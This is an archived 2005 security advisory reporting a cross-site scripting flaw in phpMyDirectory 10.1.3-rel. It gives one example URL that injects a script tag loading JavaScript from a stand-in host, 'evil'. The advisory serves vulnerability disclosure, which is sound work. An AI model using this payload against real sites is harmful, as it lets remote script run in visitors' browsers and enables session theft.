phpMyDirectory1013.txt

phpMyDirectory1013.txt: Posted Mar 25, 2005; Authored by mircia; phpMyDirectory version 10.1.3-rel is susceptible to a classic cross site scripting bug.; tags | exploit, xss; SHA-256 | dc609682ea0be436f489714c736c23bb00e7ae0fb17eecc25ac54f603a31c330; Download | Favorite | View

phpMyDirectory1013.txt



Talte Security Advisory #3

Product: phpMyDirectory 10.1.3-rel
Homepage: http://www.phpmydirectory.com/
Risk: low
Type: Cross Site Scripting
Bug Found by: "Talte Security - mircia"

phpMyDirectory is a multi-purpose script,
this script can be successfully implemented
for Proffesional Yellow pages, books library,
friend finder etc.

A cross site scripting problem exists
in subcat,page,subsubcat variables.


Examples:

http://localhost/review.php?id=1&cat=&subcat="><script src=http://evil/foo.js></script>

Everything in foo.js gets executed

// Best Regrads - Talte security, mircia

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 59 files
Debian 27 files
Valentin Lobstein 11 files
LiquidWorm 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,318)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,567)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,456)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

phpMyDirectory1013.txt

phpMyDirectory1013.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

phpMyDirectory1013.txt

Share This

phpMyDirectory1013.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems